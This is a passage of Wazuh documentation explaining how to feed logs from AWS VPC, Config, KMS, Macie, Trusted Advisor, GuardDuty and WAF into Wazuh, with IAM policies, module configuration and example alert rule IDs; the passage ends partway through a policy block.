Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

To allow an AWS user to execute the VPC integration, it must also have a policy like the following attached:

{
  "Sid": "VisualEditor0",
  "Effect": "Allow",
  "Action": "ec2:DescribeFlowLogs",
  "Resource": "*"
}
Configure Wazuh to process Amazon VPC logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="vpcflow">
        <name><WAZUH_AWS_BUCKET></name>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use cases

Using an Amazon VPC (Virtual Private Cloud), users can logically isolate some of their AWS assets from the rest of their cloud infrastructure. Users can set up their networks in the cloud. This is why it is usually important to monitor changes to their VPCs.

Create a VPC

If a VPC is created, the following alerts with rule ID 80202 will be shown on the Wazuh dashboard.

If a user without proper permissions attempts to create a VPC, the following alerts with rule ID 80203 will be shown on the Wazuh dashboard.

Working with VPC Data

A VPC alert contains data such as destination and source IP address, destination and source port, and how many bytes were sent.

These alerts can be easily analyzed by creating visualizations like the following one following the custom dashboard guide.

You can monitor your network with this visualization to identify peaks. Once a peak is identified, apply filters to view the alerts generated during that time and examine the communication between IP addresses. Since the IP address is a field in numerous AWS alerts, you may discover additional alerts and gain insights into the events that occurred.

AWS Config

AWS Config is a service that enables you to assess, audit, and evaluate the configurations of your AWS resources. AWS Config continuously monitors and records your AWS resource configurations and allows you to automate the evaluation of recorded configurations against desired configurations. With AWS Config, you can review changes in configurations and relationships between AWS resources, dive into detailed resource configuration histories, and determine your overall compliance against the configurations specified in your internal guidelines. This enables you to simplify compliance auditing, security analysis, change management, and operational troubleshooting.

Amazon configuration

The following sections cover how to configure different services required to integrate AWS config service with Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the AWS Config events into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. If you want to use an already existing one, skip this step.

  2. On your AWS console, search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Choose an appropriate Firehose stream name.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a file structure YYYY/MM/DD/HH, if a prefix is used the created file structure would be prefix-name/YYYY/MM/DD/HH. If a prefix is used it must be specified under the Wazuh bucket configuration. Select your preferred compression, Wazuh supports any kind of compression but Snappy.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new delivery stream will be created and its details will be shown as follows.

AWS Config configuration
  1. On the AWS Config page, go to Set up AWS Config.

  2. Under Recording strategy, specify the AWS resource types you want AWS Config to record:

    • All resource types with customizable overrides

    • Specific resource types

    Note

    For more information about these options, see selecting which resources AWS Config records.

  3. Create or select an existing IAM role for AWS Config.

  4. Select an existing S3 bucket and prefix or create a new one then save your configuration.

After these steps, it is necessary to configure an Amazon EventBridge rule to send AWS config events to the Amazon Data Firehose delivery stream created in the previous step.

Amazon EventBridge configuration

Configure an Amazon EventBridge rule to send Config events to the Amazon Data Firehose delivery stream created in the previous step.

  1. On your AWS console, search for "eventbridge" in the search bar at the top of the page or go to Services > Application Integration > EventBridge.

  2. Select EventBridge Rule and click Create rule.

  3. Assign a name to the EventBridge rule and select the Rule with an event pattern option.

  4. In the Build event pattern section, choose AWS events or EventBridge partner events as Event source.

  5. In the Event pattern section choose AWS services as Event source, Config as AWS service, and All Events as Event type. Click Next to apply the configuration.

  6. Under Select a target, choose Firehose delivery stream and select the stream created previously. Also, create a new role to access the delivery stream. Click Next to apply the configuration.

  7. Review the configuration and click Create rule.

Once the rule is created, every time an AWS Config event is sent, it will be stored in the specified S3 bucket. Remember to first enable the AWS Config service, otherwise, you won't get any data.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon Config logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="config">
        <name><WAZUH_AWS_BUCKET></name>
        <path>config</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use cases

AWS Config allows you to review changes in configuration and relationships between AWS resources. Below is an example of a use case for AWS Config.

Monitoring configuration changes

Multiple alerts with rule ID 80454 will be seen on the Wazuh dashboard when there are changes in the configuration of the resources monitored by AWS config. Some examples are shown in the image below.

You can expand an alert to see more information such as the resource name, resource type, and configuration state.

AWS Key Management Service (KMS)

AWS Key Management Service (KMS) makes it easy for users to create and manage keys and control the use of encryption across a wide range of AWS services and in their applications. AWS KMS is a secure and resilient service that uses FIPS 140-2 validated hardware security modules to protect their keys. AWS KMS is integrated with AWS CloudTrail to provide users with logs of all key usage to help meet their regulatory and compliance needs.

AWS configuration

The following sections cover how to configure different services required to integrate AWS KMS service with Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the AWS KMS events into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. (If you want to use an already created one, skip this step).

  2. On your AWS console, Search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Choose an appropriate Firehose stream name.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a file structure YYYY/MM/DD/HH, if a prefix is used the created file structure would be prefix-name/YYYY/MM/DD/HH. If a prefix is used it must be specified under the Wazuh bucket configuration. In our case, the prefix is kms_compress_encrypted/. Select your preferred compression, Wazuh supports any kind of compression but Snappy.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new delivery stream will be created and its details will be shown as follows.

Amazon EventBridge configuration

Configure an Amazon EventBridge rule to send KMS events to the Amazon Data Firehose delivery stream created in the previous step.

  1. On your AWS console, search for "eventbridge" in the search bar at the top of the page or go to Services > Application Integration > EventBridge.

  2. Click Create rule.

  3. Assign a name to the EventBridge rule and select the Rule with an event pattern option.

  4. In the Build event pattern section, choose AWS events or EventBridge partner events as Event source.

  5. In the Event pattern section, choose AWS services as Event source, Key Management Service (KMS) as AWS service, and All Events as Event type. Click Next to apply the configuration.

  6. Under Select a target, choose Firehose delivery stream and select the stream created previously. Also, create a new role to access the delivery stream. Click Next to apply the configuration.

  7. Review the configuration and click Create rule.

Once the rule is created, data will start to be sent to the previously created S3 bucket. Remember to first enable the service you want to monitor, otherwise, you won't get any data.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon KMS logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="custom">
        <name><WAZUH_AWS_BUCKET></name>
        <path>kms_compress_encrypted</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use case

AWS Key Management Service allows you to create and control cryptographic keys for securing your data. Monitoring this service with Wazuh allows you to understand the availability, state, and usage of your AWS KMS keys in AWS KMS.

Below is a use case for Wazuh alerts built for AWS KMS.

Monitoring KMS key usage

When KMS key usage events such as CreateKey, ScheduleKeyDeletion, DisableKeyDeletion and CreateAlias occurs, the following alerts with rule ID 80491 will be displayed on the Wazuh dashboard.

You can expand the alert to see more information such as the key policy, encryption type, and other details about the affected key.

Amazon Macie

Amazon Macie is a security service that uses machine learning to automatically discover, classify, and protect sensitive data in AWS. Macie recognizes sensitive data such as personally identifiable information (PII) or intellectual property and provides you with dashboards and alerts that give visibility into how this data is being accessed or moved. The fully managed service continuously monitors data access activity for anomalies and generates detailed alerts when it detects the risk of unauthorized access or inadvertent data leaks.

AWS configuration

The following sections cover how to configure different services required to integrate AWS Macie service with Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the Amazon Macie events into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. (If you want to use an already created one, skip this step).

  2. On your AWS console, Search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Choose an appropriate Firehose stream name.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a file structure YYYY/MM/DD/HH, if a prefix is used the created file structure would be prefix-name/YYYY/MM/DD/HH. If a prefix is used it must be specified under the Wazuh bucket configuration. In our case, the prefix is macie/.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new delivery stream will be created and its details will be shown as follows.

Amazon EventBridge configuration

Configure an Amazon EventBridge rule to send Macie events to the Amazon Data Firehose delivery stream created in the previous step.

  1. On your AWS console, search for "eventbridge" in the search bar at the top of the page or navigate to Services > Application Integration > EventBridge.

  2. Click Create rule.

  3. Assign a name to the rule and select the Rule with an event pattern option.

  4. In the Build event pattern section, choose AWS events or EventBridge partner events as Event source.

  5. In the Event pattern section, choose AWS services as Event source, Macie as AWS service, and All Events as Event type. Click Next to apply the configuration.

  6. Under Select a target, choose Firehose delivery stream and select the stream created previously. Also, create a new role to access the delivery stream. Click Next to apply the configuration.

  7. Review the configuration and click Create rule.

Once the rule is created, every time a Macie event is sent, it will be stored in the specified S3 bucket. Remember to first enable the Macie service, otherwise, you won't get any data.

Amazon Macie configuration
  1. On your AWS console, search for "Amazon Macie" in the search bar and click Amazon Macie from the results.

  2. You'll have this interface if this is the first time of setting up the service, click Get started to proceed.

  3. Click Enable Macie to enable the service.

Once enabled, Macie provides visibility into data security risks and enables automated protection against those risks. Check the official AWS documentation to learn more about the service.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon Macie logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="custom">
        <name><WAZUH_AWS_BUCKET></name>
        <path>macie</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    Check the Wazuh module for AWS reference manual to learn more about each setting.

  3. Restart Wazuh in order to apply the changes:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use case

Amazon S3 (Simple Storage Service) provides secure and reliable storage capacity in the cloud. When using this service, it is highly recommended to monitor it to detect misconfigurations and sensitive data leakage.

Below is a use case for Wazuh alerts built for S3.

Sensitive data disclosure in S3 bucket

When sensitive data such as financial information, credentials, and personal information are found in an S3 bucket, the following alerts with rule ID 80352 and 80354 will be displayed on the Wazuh dashboard.

You can expand the alert to see more information such as the description of the alert, and details about the affected S3 bucket.

AWS Trusted Advisor

AWS Trusted Advisor helps users optimize their AWS environment by following AWS best practices to provide real-time guidance that aims to reduce cost, increase performance, and improve security. Trusted Advisor logs can be stored in an S3 bucket thanks to Amazon EventBridge and Amazon Data Firehose, allowing Wazuh to process them and generate alerts using the built-in rules Wazuh provides, as well as any custom rules available.

Note

You must have a Business, Enterprise On-Ramp, or Enterprise AWS Support plan to create an EventBridge rule for Trusted Advisor checks. For more information, see changing AWS support plans.

AWS configuration

The following sections cover how to configure the different services required to integrate Trusted Advisor into Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the Trusted Advisor logs into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. If you want to use an already existing one, skip this step.

  2. On your AWS console, Search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Choose an appropriate Firehose stream name.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a file structure YYYY/MM/DD/HH, if a prefix is used the created file structure would be prefix-name/YYYY/MM/DD/HH. If a prefix is used it must be specified under the Wazuh bucket configuration. In our case, the prefix is trusted-advisor/. Select your preferred compression, Wazuh supports any kind of compression but Snappy.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new firehose stream will be created and its details will be shown as follows.

Amazon EventBridge configuration

Configure an Amazon EventBridge rule to send Trusted Advisor events to the Amazon Data Firehose delivery stream created in the previous step.

  1. On your AWS console, search for "eventbridge" in the search bar at the top of the page or navigate to Services > Application Integration > EventBridge.

  2. Click Create rule.

  3. Give a name to the EventBridge rule and select the Rule with an event pattern option.

  4. In the Build event pattern section, choose AWS events or EventBridge partner events as Event source.

  5. In the Event pattern section, choose AWS services as Event source, Trusted Advisor as AWS service, and All Events as Event type. Click Next to apply the configuration.

  6. Under Select a target, choose Firehose stream and select the stream created previously. Also, create a new role to access the delivery stream. Click Next to apply the configuration.

  7. Review the configuration and click Create rule.

Once the rule is created, every time a Trusted Advisor event is sent, it will be stored in the specified S3 bucket. Remember to first enable the Trusted Advisor service, otherwise, you won't get any data.

AWS Trusted Advisor configuration
  1. On your AWS console, search for "Trusted Advisor" in the search bar at the top of the page or navigate to Services > Management & Governance > Trusted Advisor.

  2. Go to Manage Trusted Advisor in the left menu and click on the Enabled button.

Once enabled, Trusted Advisor reviews the different checks for the AWS account. Check the official AWS documentation to learn more about the different Trusted Advisor checks available.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon Trusted Advisor logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="custom">
        <name><WAZUH_AWS_BUCKET></name>
        <path>trusted-advisor</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      systemctl restart wazuh-manager
      
    • Wazuh agent:

      systemctl restart wazuh-agent
      
Amazon GuardDuty

Amazon GuardDuty is a threat detection service that continuously monitors for malicious or unauthorized behavior to help you protect your AWS accounts and workloads. It monitors for activity such as unusual API calls or potentially unauthorized deployments that indicate a possible account compromise. GuardDuty also detects potentially compromised instances or reconnaissance by attackers.

AWS configuration

The following sections cover how to configure the different services required to integrate Guard Duty into Wazuh.

Amazon GuardDuty configuration
  1. Create a new S3 bucket. If you want to use an existing bucket, skip this step.

  2. On your AWS console, search for "guardduty" in the search bar at the top of the page or navigate to Services > Security, Identity, & Compliance > GuardDuty.

  3. S3 Protection enables Amazon GuardDuty to monitor object-level API operations to identify potential security risks for data within your S3 buckets. In the navigation pane, under Protection plans, click S3 Protection and enable S3 protection.

  4. Confirm your selection.

  5. In the navigation pane, go to Settings, scroll to Findings export options, and click Configure now to configure GuardDuty to export findings to an S3 bucket.

  6. See the configuring an S3 bucket and creating symmetric encryption KMS keys guides on how to create an S3 bucket and KMS key. Copy and paste the appropriate values into the S3 bucket ARN and KMS key ARN fields.

  7. In the Attach policy section, click on View Policy for S3 bucket and View Policy for KMS key. Copy and attach the corresponding policy to the selected S3 bucket and the KMS key. Click Save to apply the configuration.

    Note

    For more information on how to change the S3 and KMS policies, see the adding a bucket policy by using the Amazon S3 console and changing a key policy guides.

  8. You'll have an interface similar to this, you can also set the frequency for updating the S3 bucket with the GuardDuty findings. In our case, the frequency is set to 15 minutes.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon GuardDuty logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="guardduty">
        <name><WAZUH_AWS_BUCKET></name>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
GuardDuty use cases

Amazon EC2 (Elastic Compute Cloud) provides scalable computing capacity in the cloud. When using this service, it is highly recommended to monitor it for intrusion attempts or other unauthorized actions performed against your cloud infrastructure.

Below are some use cases for Wazuh rules built for EC2.

Brute force attacks

If an instance has an open port that is receiving a brute force attack, the following alerts with rule ID 80301 will be shown on the Wazuh dashboard.

It shows information about the attacked host, the attacker, and which port is being attacked.

EC2 API Calls made from unusual network

If an API call is made from an unusual network, the following alerts with rule ID 80301, 80302, and 80303 will be shown on the Wazuh dashboard.

It shows the location of the unusual network, the user who made the API calls, and which API calls it made.

Compromised EC2 instance

If there is any indicator of a compromised EC2 instance, an alert with rule ID 80303 will be shown on the Wazuh dashboard explaining what's happening. Some examples of alerts are shown below.

To sum up, the following screenshot shows some alerts generated for a compromised EC2 instance.

Amazon Web Application Firewall (WAF)

Amazon WAF is a web application firewall that helps protect your web applications from common web exploits that could affect application availability, compromise security, or consume excessive resources. AWS WAF gives you control over which traffic to allow or block to your web applications by defining customizable web security rules.

AWS configuration

The following sections cover how to configure different services required to integrate AWS WAF with Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the Amazon WAF logs into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. If you want to use an already existing one, skip this step.

  2. On your AWS console, Search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Under Firehose stream name, give the data firehose a name that starts with the prefix aws-waf-logs-.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a file structure YYYY/MM/DD/HH, if a prefix is used the created file structure would be prefix-name/YYYY/MM/DD/HH. If a prefix is used it must be specified under the Wazuh bucket configuration. In our case, the prefix is waf/.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new delivery stream will be created and its details will be shown as follows.

AWS WAF configuration

Send logs from your Web Access Control Lists (web ACLs) to the previously created Amazon Data Firehose with a configured S3 storage destination. After you enable logging, AWS WAF delivers logs to your S3 bucket through the HTTPS endpoint of Firehose.

  1. On the AWS console, search for "waf" or go to Services > Security, Identity, & Compliance > WAF & Shield.

  2. Click Go to AWS WAF.

  3. Go to Web ACLs and click the name of the Web ACL attached to your web application. If you have not configured the Web ACL, follow the set up AWS WAF guide.

  4. Go to Logging and metrics, under Logging, click Enable.

  5. Select Amazon Data Firehose stream as Logging destination, and select the previously created firehose stream under Amazon Data Firehose stream.

  6. Under Filter logs, apply your preferred filtering requirements and click Save. In our case, we set up the filter to log blocked web requests only.

  7. Confirm that logging is enabled.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
